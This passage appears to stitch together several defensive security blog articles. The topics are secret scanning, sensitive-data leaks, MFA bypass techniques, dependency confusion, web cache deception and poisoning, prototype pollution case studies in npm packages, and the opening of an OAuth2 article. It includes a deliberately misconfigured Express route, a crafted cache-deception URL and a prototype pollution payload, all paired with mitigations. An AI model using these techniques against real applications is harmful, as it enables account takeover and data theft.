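  return SECRET_PATTERNS
    .filter(({ regex }) => regex.test(text))
    .map(({ name }) => name);
}

// AWS's documented example key, so nothing real is exposed here.
console.log(scanForSecrets('const key = "AKIAIOSFODNN7EXAMPLE";'));
// → [ 'AWS Access Key ID' ]
```

A real pipeline would run a dedicated tool with a much larger rule set, but the principle, pattern-matching every diff before it lands, is the same.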

Sensitive Data Leaks in a Log File

The Log4j issue may be the first thing that springs to mind when thinking about security in logging functions. Yet logging itself can pose a significant security risk, because many developers use it as an internal debugging tool and log far more data than is required. Sometimes the logged data contains very sensitive information that should not be recorded anywhere, and recording it can cause severe security incidents. For example, a couple of years back, Twitter urged its users to change their passwords because unmasked passwords had been written to an internal log file.

We found three main reasons why developers log sensitive information into log files:

  • Debug log statements are not removed before shipping into production

Throughout development, many developers use logging as a debugging method. They add log statements to track changes, but forget to delete the debug log statements before merging the code into production.

  • Developers are not fully aware of what is logged

As the system becomes more complex, one function requires interactions from multiple services and data is passed between many services. Data transmitted from an upstream service may contain sensitive data, but developers at a downstream service are unaware of the payload in the data. As a result, critical data may be unintentionally logged.

  • Filtering is not applied for debug log

Under some circumstances, it is necessary for a developer to log an error or exception along with the payload causing this error. This could be a problem if no filtering or masking is applied because the exception or the payload could contain sensitive data. 

Mitigation

  1. Integrate sensitive-log-statement detection into your CI/CD process and enforce it at the PR level.
  2. Motivate peer reviewers to pay close attention to logging functions.
  3. Employ tagged or structured logging.
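As a sketch of point 3, structured logging makes masking mechanical: if log payloads are objects rather than free-form strings, a filter can redact known-sensitive fields before anything is written. The field names below are assumptions for illustration:

```javascript
// Sketch of field masking for structured logging. SENSITIVE_FIELDS is
// an assumed list; extend it to match your own data model.
const SENSITIVE_FIELDS = new Set(["password", "ssn", "token", "creditCard"]);

// Return a copy of the payload with sensitive fields redacted.
function maskPayload(payload) {
  return Object.fromEntries(
    Object.entries(payload).map(([key, value]) =>
      SENSITIVE_FIELDS.has(key) ? [key, "***REDACTED***"] : [key, value]
    )
  );
}

// Even if an upstream payload sneaks a password in, the log stays clean.
console.log(JSON.stringify(maskPayload({ user: "alice", password: "hunter2" })));
// → {"user":"alice","password":"***REDACTED***"}
```

Routing every log call through a filter like this addresses the "developers are not fully aware of what is logged" problem, because the masking happens regardless of what the upstream payload contains.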

Sensitive Data Leaks When Using Online Tools

Presently, as more organizations move to the cloud, numerous tools, such as Base64 decoders, JSON formatters, diff checkers, online data-sharing tools, API testing platforms (e.g., Postman), and even the trendy ChatGPT, have online versions. Many developers benefit from these web tools because a simple copy/paste produces the desired output.

However, using these online tools carries the risk of disclosing some of your data to the public, as you cannot control where your data will go. Many engineers appear unaware of the potential consequences; for example, according to a recent study, 2.3% of workers have pasted sensitive material into ChatGPT.

You can find a number of API tokens that have been exposed by searching Postman’s public network with certain keywords (token, secret, etc.).

Mitigation

  1. Train engineers not to send sensitive data to online tools.
  2. Install a toolkit locally instead of using online tools.

Sensitive Data Leaks in Misconfigured Cloud Environments

Misconfiguration in a cloud environment is another way an engineer can mistakenly expose sensitive data publicly. There are many types of cloud misconfiguration, but a typical one is an engineer granting overly broad permissions to a cloud asset. For example, an engineer could mistakenly configure an S3 bucket policy to grant public access to a bucket containing sensitive information, causing a sensitive data leak. Internal instances can also be accidentally deployed to the public without authorization.

Mitigation

  1. Keep persistent surveillance of your cloud environment.
  2. Apply your security configuration during the build stage, and be wary of giving engineers or DevOps ad hoc access or permissions.
  3. Give engineers the bare minimum of permissions needed for the task at hand.

Sensitive Data Leaks in Insecure Channels

As a developer, it is safe to assume that you frequently use Zoom and Slack. Although these tools are simple to use, it is also easy to unintentionally divulge private information and sensitive data via a Zoom chat or a Slack message.

You might think you are just sharing among coworkers, but if you post sensitive information in a public channel where anyone at your company can see it, there is no way to know how widely it will be distributed inside or beyond the company.

Mitigation

  1. Train employees not to share sensitive data that they wouldn't put in an email
  2. Integrate automation tools to detect sensitive data across these insecure channels

Conclusion

Both technical and human errors have the potential to expose sensitive information. Even if you have strong data protection systems in place to guard against technical errors, there are still many ways a developer can expose private information.

When it comes to cybersecurity, humans are always the weakest link, and human error is very difficult to avoid. For instance, a developer might unintentionally push private information into a public repository using their own account; by the time an automation tool notices it, it may already be too late. As a developer, please avoid making these frequent mistakes when committing your code or sharing data.

Limitations of MFA and Common techniques to bypass MFA

A lesson learned from Uber and Reddit Security Incident

MFA is becoming increasingly popular as a means of combating rising identity theft through phishing and of complying with identity and access management regulations. MFA has proved to be a simple but effective security control for reducing organizational risk.

However, recent security incidents at Reddit and Uber demonstrate MFA's limitations. Furthermore, while participating in some security group discussions, I discovered that some security engineers are not fully aware of these limitations, which could jeopardize your organization whether you use a third-party MFA or implement your own. In this article, we detail the most commonly overlooked limitations of MFA.

Some Limitations of MFA

Here are some MFA drawbacks that are frequently encountered.

MFA can reduce phishing attacks significantly, but cannot eliminate them

MFA can be bypassed, even for mature vendors

Misconfiguration and poor implementation may render your MFA useless

Email- and SMS-based MFA are not as secure as you might expect

Limitation 1: MFA will NOT eliminate successful phishing attacks

MFA makes it more difficult for hackers to gain access to networks and information systems when passwords or personal identification numbers (PINs) are compromised through phishing or other means, because MFA adds factors such as OTPs, SMS codes, and app push notifications on top of the password or PIN. Because of this, many security administrators disregard other security measures or security training, believing that having MFA makes them immune to phishing attempts.

However, the additional factors can themselves be vulnerable to phishing, leaving you exposed to successful phishing attacks; the recent Uber and Reddit security incidents are two good examples. Take the Uber breach: though the compromised Uber account was protected with multi-factor authentication, the attacker allegedly used an MFA fatigue attack and pretended to be Uber IT support to convince the employee to accept the MFA requests, completing a successful phishing attack.

Limitation 2: MFA can be bypassed, even for mature vendors

Many MFA vendors claim that their solutions are well-configured to prevent unauthorized authentication. In reality, there is no one-size-fits-all MFA solution; many MFAs remain vulnerable to multiple methods of circumventing authentication security. Here are some common MFA bypass methods that have been used in the wild:

1. AitM Phishing or Use of transparent reverse proxies

Different from traditional phishing attacks, AitM (Adversary-in-the-Middle) phishing, or the use of transparent reverse proxies, automatically relays the credentials (username and password) to the real login page, and even the MFA code if MFA is enabled. When the victim completes the MFA challenge, the real login page completes the login session and the proxy steals the session cookie. Once the attacker has the session cookie, they can log in and bypass MFA by making requests with the session cookie directly.

According to Proofpoint, the use of transparent reverse proxies (TRPs) is growing in popularity as more toolkits, such as Evilginx2, become available on the market.

2. Authentication code or OTP interception via email or SMS 

SMS-, email- and other OTP-based MFA are popular solutions due to their simplicity. However, the authentication code can be intercepted by hackers in various ways, from traditional social engineering to the more recent OTP interception bots, which show how authentication codes can be intercepted at scale and used to bypass MFA.

Limitation 3: MFA protection could be useless due to flaws in pages that handle it

In many instances, improper MFA implementation in your application gives hackers a way around MFA authentication. Below are some cases where MFA can be bypassed due to flaws in the implementation.

Lack of rate limit control leads to brute force

The MFA authentication code or OTP is typically 4 or 6 digits long. A hacker may use brute force to obtain the right code if the application's rate limiting is ineffective.

Here are a few disclosures from HackerOne:

Bypass Slack Two Factor Authentication using Brute Force and Bypass Ubiquiti 2FA using Brute Force.
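The missing control in those reports can be sketched as a per-user attempt counter consulted before OTP verification. The in-memory Map below is an assumption for illustration; a real deployment would use a shared store (e.g. Redis) with an expiry window:

```javascript
// Sketch of OTP verification with a brute-force lockout. The Map is an
// illustrative in-memory store; use a shared store in production.
const MAX_ATTEMPTS = 5;
const attempts = new Map();

function verifyOtp(userId, submitted, expected) {
  const count = attempts.get(userId) || 0;
  if (count >= MAX_ATTEMPTS) {
    return { ok: false, reason: "locked" }; // stop the brute force here
  }
  attempts.set(userId, count + 1);
  if (submitted === expected) {
    attempts.delete(userId); // reset the counter on success
    return { ok: true };
  }
  return { ok: false, reason: "invalid" };
}

// A 6-digit OTP has 1,000,000 combinations; capped at 5 attempts, a
// blind guess succeeds with probability of only about 0.0005%.
```

Without the counter, the same function could be called a million times, which is exactly what the Slack and Ubiquiti reports exploited.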

Buggy MFA implementation leads to MFA bypass

MFA protection may be useless if the authentication-code verification is faulty. Here are a few instances of improper MFA implementation that I have observed during penetration testing and learned from public disclosures:

An authentication code for one user can be used by another user

For instance, after logging into his own account, an attacker may obtain a valid OTP token for himself and then use it to defeat MFA while authenticating as the victim.

A prior session's authentication code can be reused

Another frequent occurrence is that an authentication token created for a previous session persists after use. That implies that MFA may be defeated if an attacker obtains any earlier authentication code.

Logic Error for MFA code verification

A public disclosure about a 2FA bypass shows that 2FA was bypassed when a user sent an empty authentication code to the server.

The situations just stated are but a few; in my opinion, there are many more implementation errors contributing to the failure of MFA.

Limitation 4: Email and SMS based MFA are not really sufficient

One misconception about MFA is that all MFA methods have the same security effect because they all add an extra authentication factor to protect account login. Because of this misunderstanding, many businesses opt for the most convenient methods to implement, such as SMS or email tokens.

The fact is that some methods are fundamentally more secure than others, while others are merely more practical. The graphic below shows the varying security effects of the most popular MFA techniques; the weakest methods are email-based and SMS-based MFA.

Because an email address is not linked to a particular device, email-based 2FA is the least secure of all methods: many MFA bypass techniques start with a breach of the victim's email account, from which it is simple to obtain the authentication code. Beyond email-based MFA, much security research also shows that SMS-based MFA can impose additional risk on your organization.

Potential Methods to Enhance Your MFA

MFA has its limitations, but there are things we can do to lessen their effects.

  • Improve Security Awareness Training
  • Avoid using SMS or email-based MFA and opt for key-based MFA, if possible
  • Enforce Secure SDLC when implementing your own MFA
  • Ensure the MFA has a throttle or account lockout method enabled
  • Regularly audit your MFA login logs

Conclusion

Setting up MFA is still the best thing you can do to safeguard your account login, despite its limitations. But it is crucial to be aware of those limitations and to remember not to rely completely on its security, whether you use MFA from a reputable provider or implement it yourself.

How Dependency Confusion attack works and How to prevent it

Dependency confusion is a novel type of supply chain security issue, first disclosed by Alex Birsan in 2021. This attack, as the name implies, works by confusing a dependency manager tool (npm for Node.js, pip for Python, RubyGems for Ruby) into installing a malicious dependency package.

Before we dive deep into the issue, let's look at how package manager tools pull and install packages on a workstation. The graphic below depicts the workflow when the command 'npm install express' is run on a workstation.

How Package Manager Tool works

How does a dependency confusion attack work?

A dependency confusion attack occurs when a dependency library is downloaded from a public registry rather than the intended private/internal registry, because a malicious attacker has tricked the package manager (npm for Node.js, pip for Python, RubyGems for Ruby) into downloading a malicious package from a public repository the attacker controls.

To deceive the package manager tools into downloading the malicious package from the public registry, the attacker must meet the following prerequisites.

  1. Find the name of a package that the victim wants to install
  2. Create an identically named package and publish it to the public or default registry.
  3. Assign the package a higher version number to trick the package manager tool into downloading it from the public repo.

Occasionally, the private registry is misconfigured, and as a result a developer's machine or a server may erroneously pull packages from the public registry. For example, if a developer tries to install an internal package at home without access to the private registry where the valid packages are hosted, the package manager will check whether a package with the same name is hosted on a public registry and use it.

The diagram below depicts how dependency confusion exploits are initiated.

How to prevent dependency confusion attacks?

There is no silver bullet to prevent dependency confusion, as this kind of attack is a consequence of an inherent design flaw in the default configuration of many package manager tools. Instead, there are a number of best practices we can follow to mitigate the potential risks.

Here are a number of best practices and mitigation method we could use

1. Prevent at the source: Reserve the package name in the public registry
2. Prevent at the source: Reserve a company namespace or scope in the public registry
3. Prevent at configuration: Utilize namespaces and scopes to ensure the private registry is used
4. Prevent at configuration: Use version pinning to explicitly declare package versions
5. Prevent at action: Verify the package source before installing
6. Continuous monitoring: Monitor the public registry and get alerted

Prevent at the Source: Reserve the package name in public registry

By claiming all internal package names in the public or default registry, you prevent a malicious attacker from hijacking those package names and publishing malicious packages under the public registry.

This method prevents a malicious package with the same name as an internal package from being published to the public registry in the first place, which makes it a highly effective and reliable way to prevent dependency confusion, regardless of server misconfiguration or human error when pulling a dependency package.

Prevent at the Source: Reserve a company namespace or scope 

Another way to prevent dependency confusion at the source is to reserve a company namespace or scope in the registry. A scope or namespace enables you to create a package with the same name as another user’s or organization’s package without conflict. This means that an organization can claim many package names under a special namespace, but an attacker will not be able to create packages under this scope because only the owner of the scope could publish packages under this scope.

The potential disadvantages are: (a) you must modify your package manifest files to include the namespace or scope; (b) if the namespace or scope is ignored during a manual package installation, a developer might nonetheless fetch a harmful package.

Prevent at Configuration: Utilize namespace and scope to ensure the private registry is used (Client-Side Control)

Some package managers allow for namespaces or other prefixes, which can be used to ensure that internal dependencies are pulled from private repositories (eg, Github) or registry defined with the appropriate prefix/scope.

Here’s an example where the dependency is explicitly stated to be pulled from a Github repository.
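The example referenced above is not preserved here, but the idea can be sketched as a package.json fragment (shown as a JavaScript object; the @mycompany scope, the package names and the repo path are all hypothetical):

```javascript
// Hypothetical package.json "dependencies" section. Only the owner of
// the @mycompany scope can publish under it, and the git URL forces the
// second package to come from a specific GitHub repository, never from
// a registry lookup that an attacker could hijack.
const dependencies = {
  "@mycompany/internal-ui": "1.4.2",
  "internal-build-tools": "github:mycompany/internal-build-tools#v2.0.1",
};

// In .npmrc, the scope can additionally be mapped to the private registry:
//   @mycompany:registry=https://npm.internal.mycompany.example/
console.log(Object.keys(dependencies));
```

With the scope-to-registry mapping in place, a request for any @mycompany package can never fall through to the public registry.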

Prevent at configuration: Version pinning 

Dependency version pinning is a client-side control that specifies the exact version of a package an application will use. Setting the dependency version ensures the package manager will not pull and install dependencies from the public registry even if a malicious attacker assigns a higher version number to a malicious package with an identical internal package name.

There are some downsides to version pinning. If you pin versions only in the package management manifest file, for example package.json, it protects just your direct dependencies; transitive dependencies can still be vulnerable to dependency confusion. You should therefore pin versions in the lock file, for example package-lock.json, which locks both direct and transitive dependencies to specific versions.
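As an illustration (the package name and versions are arbitrary), the difference between a ranged and a pinned declaration looks like this; only the lock file extends the guarantee to transitive dependencies:

```javascript
// A caret range lets npm resolve to any compatible newer release,
// which is exactly what a higher-versioned malicious package exploits.
const ranged = { dependencies: { express: "^4.18.0" } };

// An exact version pins the direct dependency to one known release...
const pinned = { dependencies: { express: "4.18.2" } };

// ...but only package-lock.json records exact versions (plus integrity
// hashes) for the whole tree, including transitive dependencies.
console.log(pinned.dependencies.express);
```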

Prevent at action: Verify package source before install

It would be very beneficial if developers validated the package source before installing a new package or upgrading to a higher version, to avoid human error. Take npm, for example: you can use the npm view command to inspect a package before installing it. Below is the result of running the command npm view express, which shows the source of the package.

Continuous Monitoring: Monitor the public registry and get alerted

I once wrote an automation tool to combat package typosquatting attacks by sending HTTP requests to public registries to check for typosquatting packages; an alert is sent to our organization when a potential typosquatting package is detected. I believe a similar tool could run at regular intervals to alert you when your internal package names are published in public registries.
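Such a monitor can be sketched as follows, assuming Node 18+ for the built-in fetch; the internal package names are hypothetical, and the decision logic is split out so it can be checked without network access:

```javascript
// Hypothetical internal package names to watch for on the public registry.
const INTERNAL_PACKAGES = ["mycompany-auth-client", "mycompany-build-utils"];

// The npm registry answers 200 for an existing package and 404 otherwise.
function isPubliclyPublished(statusCode) {
  return statusCode === 200;
}

// Run one scan pass; wire the returned names up to your alerting channel.
async function scanOnce() {
  const alerts = [];
  for (const name of INTERNAL_PACKAGES) {
    const res = await fetch(`https://registry.npmjs.org/${encodeURIComponent(name)}`);
    if (isPubliclyPublished(res.status)) {
      alerts.push(name);
    }
  }
  return alerts;
}
```

Scheduling scanOnce from a cron job or CI pipeline gives you the "get alerted" half of this best practice.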

Conclusion

Defending against dependency confusion attacks is a critical component of software supply chain security. Many controls and countermeasures can be implemented at the source or configuration level by your company. Because imposed countermeasures cannot always prevent human error, it is critical to train your engineers to exercise caution and follow the aforementioned best practices when upgrading or adding a package.

Web Cache Security Issues: Web Cache Deception and Web Cache Poison

How does web cache work?

To reduce HTTP request latency and ease the performance load on application servers, a web application may have some of its web data, for example images, JS files, CSS files, HTML content, JSON templates and URLs, copied and stored in a different place (your browser, a proxy server or a CDN) for a certain amount of time; we call this a cache. Once stored, this cached web data can be served to users directly, rather than asking the application servers to extract the same data over and over again.

In general, a web cache can be categorized as a client-side cache (browser cache) or a remote server-side cache (proxy, CDN). Data stored in the browser serves only the local user of that browser, whereas cached data on the server side is distributed and served to many users.

The diagram below depicts how Client Side Cache and Server Side Cache work in a web request, and how App Server could reduce the requests by utilizing cache.

How web cache works

Security Issues in Web Cache

Web caching improves performance and convenience, but it has a drawback: security. 

Security issues in the client-side cache (browser cache)

The risk with browser-side caches is that you may leave sensitive information in the browser cache, where other users of the same browser could steal it. This risk is most likely on public terminals, such as those found in libraries and Internet cafes. In this article, we will focus on security issues in the server-side cache.

Security Issues in the server side cache

The most common security issues discovered in web caches are web cache deception and web cache poisoning. Web cache deception is when an attacker tricks a caching server into incorrectly storing the victim's private information, and then gains access to that data by querying the cache server. In contrast, web cache poisoning is an attack in which a malicious user stores malicious data in the web cache server, which then distributes it to many victims.

Difference between Web Cache Deception and Web Cache Poison

Engineers are frequently perplexed by the terms Web Cache Deception and Web Cache Poison. Let’s use the table below to tell the difference between web cache deception and web cache poison.

Cache Deception

Which data are cached? The victim's private data, stored unconsciously.

How does an exploit happen?

1. An attacker crafts a path within an application, such as http://example.org/profile.php/noexistening.js, and causes the victim to click on the link.

2. Assuming the victim has logged in and the profile.php page contains sensitive data, the victim clicks on the link http://example.org/profile.php/noexistening.js. Due to some loose configuration or misconfiguration, the app server receives the request and pulls the data for the page http://example.org/profile.php.

3. Because the content of this page has not yet been cached in the cache server (step 6 in Diagram 1), the data will now be cached: the extension noexistening.js makes the cache server treat it as a static file.

4. Now the victim's sensitive data under http://example.org/profile.php/noexistening.js has been cached in the web cache server.

5. The attacker can request http://example.org/profile.php/noexistening.js to pull the data from the web cache server, as most web cache servers have no authentication implemented.

Is interaction required? Yes. The attacker has to trick the victim into visiting a crafted link, and only victims who access the crafted link are affected.

Cache Poison

Which data are cached? Malicious data crafted by an attacker.

How does an exploit happen?

1. An attacker identifies and evaluates unkeyed inputs in the HTTP request, mostly headers.

2. The attacker injects a piece of malicious code into the unkeyed inputs and makes a request to the app server.

3. The app server builds the response for the malicious request by consuming the malicious code.

4. The response with the malicious code is rendered to the attacker, and the response content is stored on the web cache server.

5. A victim makes a request to the same page as the attacker and obtains the cached data from the web cache server. The malicious code is executed at the victim's end because the cached data contains it.

Is interaction required? No. It affects any user who gets data from the compromised cache server.

Difference between Web Cache Deception and Web Cache Poison

According to the table above, certain prerequisites must be met for a successful web cache deception or web cache poisoning.

Prerequisites for web cache deception
  • The web cache setting is based on file extension, disregarding cache headers
  • The victim has to be authenticated when the attacker tricks them into accessing the crafted link.
  • Loose configuration or misconfiguration exists in the application route handler, so that the web server returns the content of https://yourapplication/profile when users request https://yourapplication/profile/test.js. The following snippet is a simple Node.js application with this kind of misconfiguration.
var express = require("express");
var app = express(); // express.createServer() was removed in Express 3+

// Any path beginning with /profile (including /profile/test.js)
// is handled by the same route and returns the profile page.
function fooRoute(req, res, next) {
  res.send("YOUR_PROFILE_PAGE");
}
app.get("/profile*", fooRoute);
app.listen(3000);
Prerequisites for web cache poison
  • An attacker needs to identify some unkeyed headers and be able to trigger the backend server to return content containing the malicious payload added to those unkeyed headers
  • The content with the malicious payload is cached by the cache server and distributed to the victims.
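The notion of an "unkeyed" input can be made concrete. A cache typically builds its lookup key from only a few request properties, so two requests that differ only in an unkeyed header map to the same cache entry (the header name and key format below are illustrative):

```javascript
// Conceptual sketch: a cache key usually covers only method + host +
// path. Anything outside the key, such as the X-Forwarded-Host header
// here, is "unkeyed" input.
function cacheKey(req) {
  return `${req.method} ${req.host}${req.path}`;
}

const victimRequest = {
  method: "GET", host: "example.org", path: "/home", headers: {},
};
const attackerRequest = {
  method: "GET", host: "example.org", path: "/home",
  headers: { "x-forwarded-host": "evil.example" }, // ignored by the key
};

// Both requests map to the same cache entry, so a poisoned response
// generated for the attacker's request gets served to the victim.
console.log(cacheKey(victimRequest) === cacheKey(attackerRequest)); // → true
```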

How to Prevent Web Cache Deception and Web Cache Poison

It is unlikely that you can ask your engineering team to disable caching altogether. Here are some common mitigation methods that can prevent these kinds of cache issues.

Only Cache Static File

Caching should be applied strictly to truly static files, whose content does not change based on user input.

Don't accept GET requests with suspicious headers

Some web developers do not implement strict validation of HTTP request headers, because it is genuinely hard for an attacker to modify the headers of requests originated by a victim. However, when this weakness is combined with a web cache, the damage can be devastating. When the web server processes a GET request, it should run a validation function over certain HTTP headers.

Prototype Pollution, an overlooked application security hole

Some well-known NPM packages, including ember.js, xmldom, loader-utils and deep-object-diff, have recently been found to contain prototype pollution vulnerabilities. I decided to investigate these vulnerabilities to see whether there were any trends we could identify and steer clear of.

All of these NPM packages are open source, which allows us to evaluate where the vulnerabilities were introduced and how they were remediated by reviewing the fixes.

A brief Overview of Prototype Pollution Vulnerability

Before digging into these vulnerable libraries to look for common patterns, we need to examine some fundamental concepts: what a prototype is in JavaScript, how prototype pollution vulnerabilities are introduced, and how they can be exploited.

What is a Prototype in JavaScript?

Every object in JavaScript has a built-in property called its prototype. The prototype is itself an object, so the prototype has its own prototype, forming what’s called a prototype chain. The chain ends when we reach a prototype whose own prototype is null.

The following code snippet defines an object called Student; the prototype of Student is Object, which has many predefined properties.
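A minimal sketch of a Student object along these lines (the exact definition here is an assumption for illustration) could be:

```javascript
// A constructor function: instances of Student inherit from Student.prototype,
// which in turn inherits from Object.prototype
function Student(name) {
  this.name = name;
}

var stud = new Student("Alice");

// The prototype chain: stud -> Student.prototype -> Object.prototype -> null
console.log(Object.getPrototypeOf(stud) === Student.prototype);             // true
console.log(Object.getPrototypeOf(Student.prototype) === Object.prototype); // true
console.log(Object.getPrototypeOf(Object.prototype));                       // null

// toString() is not defined on Student, yet it works: it is inherited from Object.prototype
console.log(stud.toString()); // "[object Object]"
```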

One power of the prototype is that it allows an object to inherit properties and attributes from its prototype. In this case, a Student object can inherit and use all the predefined properties of its prototype, Object.

Key takeaway 1: an object can access the properties/attributes of its prototype through prototype inheritance. In this example, the toString() function is defined by Student's prototype, Object, and can be accessed by any Student object.

Key takeaway 2: an object can have many instances, and they all share the same prototype properties.

Key takeaway 3: JavaScript allows some object attributes to be changed at runtime, including the prototype property, though overwriting the prototype of a default object is considered a bad practice.

How does prototype pollution occur and how is it exploited

As the term “prototype pollution” suggests, it happens when a hostile attacker gains the ability to manipulate and alter an object’s prototype. Once an attacker can modify an object’s prototype, all the instances that share the prototype’s properties are affected.

To clarify the explanation, let us tweak the aforementioned code by replacing the toString() property of the Object prototype with a customized function.
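A self-contained sketch of that tweak (assuming a Student object like the one described) could be; note that it pollutes Object.prototype for the whole runtime, so run it in a scratch console:

```javascript
function Student(name) {
  this.name = name;
}
var studObj = new Student("Alice");

// studObj.__proto__ is Student.prototype; one more .__proto__ reaches
// Object.prototype, which almost every object shares
studObj.__proto__.__proto__.toString = function () {
  return "I am changed";
};

console.log(studObj.toString()); // "I am changed"
console.log({}.toString());      // "I am changed" -- a brand-new object is affected too
```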

When running the above code in the browser console, the studObj.toString() statement will execute the new toString() function once we update the toString() of its Object prototype, and the same is true for a newly created object {}, since both share the same Object prototype.

If you look at the payload we used in the example above, you’ll see that it has three parts.

Part 1: studObj.__proto__.__proto__.

This part obtains the target Object.prototype; you may see many more .__proto__. segments in actual payloads if the prototype chain is very long.

Part 2: .toString 

This part identifies which property we wish to change or add on Object.prototype. In this example, we want to override the toString() function defined on Object.prototype.

Part 3: = function() {return "I am changed"}

This part assigns the new value to the prototype property.

In a nutshell, a successful exploit requires access to Object.prototype and the ability to modify or add its properties. You may wonder how any app would allow these conditions to be met. In the next section, we will examine four recent prototype pollution vulnerabilities to 1) see how they were introduced into the code and 2) see what sort of mitigation methods were employed to fix them.

Case studies for Prototype Pollution Vulnerability & Remediation

Case 1: Prototype Pollution Vulnerability in Ember.js < 4.4.3

Root Cause

Ember.js provides two functions, EmberObject.setProperties and EmberObject.set, to set the properties of an object.

As there is no validation of the untrusted path variable, an attacker who sets the path to __proto__.__proto__.srcdoc can modify a property of the fundamental Object prototype, which affects all objects inheriting from it.
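Ember's real implementation is more involved; a deliberately naive, hypothetical set(obj, path, value) helper shows how an unvalidated dotted path reaches the prototype:

```javascript
// Hypothetical, vulnerable path-assignment helper (NOT Ember's actual code)
function set(obj, path, value) {
  var keys = path.split(".");
  var cur = obj;
  for (var i = 0; i < keys.length - 1; i++) {
    cur = cur[keys[i]]; // no check: "__proto__" walks up the prototype chain
  }
  cur[keys[keys.length - 1]] = value;
}

var target = {};
// For a plain object, a single __proto__ already reaches Object.prototype
set(target, "__proto__.polluted", "yes");

console.log({}.polluted); // "yes" -- every plain object now sees the property
```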

Mitigation

Referring to the remediation PR, the mitigation is to forbid the specific keywords __proto__ and constructor in order to block prototype chain access.
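That style of keyword filtering can be sketched as follows (names and structure are hypothetical, not the actual Ember patch):

```javascript
var BLOCKED_KEYS = ["__proto__", "constructor", "prototype"];

// Hypothetical hardened setter: rejects paths that could reach a prototype
function safeSet(obj, path, value) {
  var keys = path.split(".");
  keys.forEach(function (k) {
    if (BLOCKED_KEYS.indexOf(k) !== -1) {
      throw new Error("Disallowed key in path: " + k);
    }
  });
  var cur = obj;
  for (var i = 0; i < keys.length - 1; i++) {
    if (cur[keys[i]] === undefined) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

safeSet({}, "profile.name", "Alice");      // fine
// safeSet({}, "__proto__.polluted", "x"); // throws: Disallowed key in path
```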

Case 2: Potential Prototype Pollution vulnerability in xmldom < 0.7.7

Root Cause

The potential prototype pollution vulnerability (CVE-2022-37616) arises from the function this library provides to copy one DOM element to another. (I marked it as potential because a valid POC has not been provided and this copy is NOT performing a deep clone.)

Mitigation

The mitigation (PR) uses the hasOwnProperty() method to determine whether the src object has the requested property as its own property (as opposed to inheriting it from the prototype). The copy function skips any attribute inherited from the prototype, preventing a malicious user from reaching the prototype's properties.
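The idea of the fix can be sketched like this (a simplified illustration, not xmldom's exact code):

```javascript
// Copy only the source's OWN properties; skip anything inherited via the prototype
function copy(src, dest) {
  for (var p in src) {
    if (Object.prototype.hasOwnProperty.call(src, p)) {
      dest[p] = src[p];
    }
  }
  return dest;
}

var src = Object.create({ inherited: "from prototype" });
src.own = "own value";

var dest = copy(src, {});
console.log(dest.own);       // "own value"
console.log(dest.inherited); // undefined -- inherited properties are not copied
```

Calling hasOwnProperty through Object.prototype (rather than src.hasOwnProperty) is a common hardening trick, since an attacker-controlled object could shadow its own hasOwnProperty.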

Case 3: Prototype Pollution in webpack loader-utils < 2.0.3

Root Cause

This vulnerability (CVE-2022-37601) was caused by the queryParse() function when parsing the query parameters and composing a new object called result from the query parameter names and values.

Mitigation

The mitigation is straightforward: create the result object with Object.create(null), since objects created this way do NOT inherit from Object.prototype. This means the created object cannot reach the prototype's properties.
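A short demonstration of why Object.create(null) helps:

```javascript
// An object with no prototype at all
var result = Object.create(null);
console.log(Object.getPrototypeOf(result)); // null

// "__proto__" is just an ordinary own property here, because the magic
// __proto__ accessor lives on Object.prototype, which result does not inherit
result["__proto__"] = { polluted: "yes" };
console.log(result["__proto__"].polluted); // "yes" (a plain own property)
console.log({}.polluted);                  // undefined -- no global pollution
```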

Case 4: Prototype Pollution in deep-object-diff

Root Cause

This weakness was introduced when two items were compared deeply and the difference between the two objects was returned as a new object. Because the difference may contain a prototype property and is under the attacker's control, it enables prototype pollution.

Mitigation

Similar to Case 3, the mitigation uses Object.create(null) to create an object that does not inherit any prototype properties.

Going through all the reported vulnerabilities, it seems they are likely to be introduced when one of the following operations occurs:

  1. Path assignment to set the property of an object (Case 1, Case 3)
  2. Cloning/copying an object (Case 2, Case 4)

The common mitigation methods include:

  1. Create objects without prototype inheritance using Object.create(null) (Case 3, Case 4)
  2. Use the hasOwnProperty() function to check whether a property is on the actual object or inherited via the prototype (Case 2)
  3. Validate user input with specific keyword filtering (Case 1)

Prototype Vulnerabilities, a much wider security issue

After reviewing several real-world examples of how prototype pollution vulnerabilities arise and how to exploit them, I went on to examine some NPM open source libraries to determine whether prototype pollution is a widely ignored issue across the NPM ecosystem.

Without spending too much effort, I discovered and verified that two open source libraries used for merging objects are vulnerable to prototype pollution, by scraping source code on GitHub using the specific patterns listed below.

These two libraries appear to be rather dated, though they still see hundreds of downloads every week. I have contacted the maintainers but have not yet received a response.

All of these instances, in my opinion, are really the tip of the iceberg in terms of how JavaScript libraries are vulnerable to prototype pollution.

I see two possible explanations for why this vulnerability is so prevalent: 1) given that it is relatively recent, few developers appear to be fully aware of it; 2) at the moment, automated methods for finding this kind of vulnerability are not very mature.

How to Identify OAuth2 Vulnerabilities and Mitigate Risks

OAuth2 Vulnerability Case Studies based on HackerOne Public Disclosure Reports

Even though OAuth2 has been the industry-standard authorization framework since it replaced OAuth1 in 2012, its many complexities have led to potential security issues. For security engineers, it’s vital to understand what OAuth2 is, how it works, and how poor implementation can lead to vulnerabilities.

In this article, we’ll highlight some common attack vectors and vulnerabilities against OAuth2 by referring to actual cases from HackerOne public disclosure reports, and explain how to mitigate them.

What is OAuth2?

OAuth2 is a widely used framework for access delegation, which allows users to grant one application (the client application) limited access to their resources hosted on another application or website (the resource application).

If you have some basic knowledge about OAuth2 but have never implemented OAuth2 in your application, the two diagrams below might help you to refresh the concepts of OAuth2 and the mechanism of how it works. The diagrams illustrate the workflow for two common OAuth2 grant types, authorization code grant (Figure 1) and the still-in-use but deemed insecure implicit grant (Figure 2).

OAuth2 itself is fundamentally complicated, as it is designed to solve the vital authorization problem across many complex web environments (mobile apps, web servers, etc.). Due to this complexity, many security engineers may not fully understand OAuth2. As a consequence, we observe many security issues caused by misconfiguration or poor implementation of OAuth2. To make it worse, some exploits against these misconfigurations are extremely simple and easy to launch.

Common OAuth2 Vulnerabilities from HackerOne’s Public Disclosure

Let’s take a look at some common attack vectors or vulnerabilities against OAuth2 by referring to HackerOne public disclosure reports. We hope the explanations of these vulnerabilities are clear by making reference to the actual exploitation disclosure. At the end of each of the following sections, you will also learn how to mitigate these vulnerabilities.

Vulnerability 1: Missing validation in redirect_uri leads to access token takeover

HackerOne Reports:

https://hackerone.com/reports/665651

https://hackerone.com/reports/405100

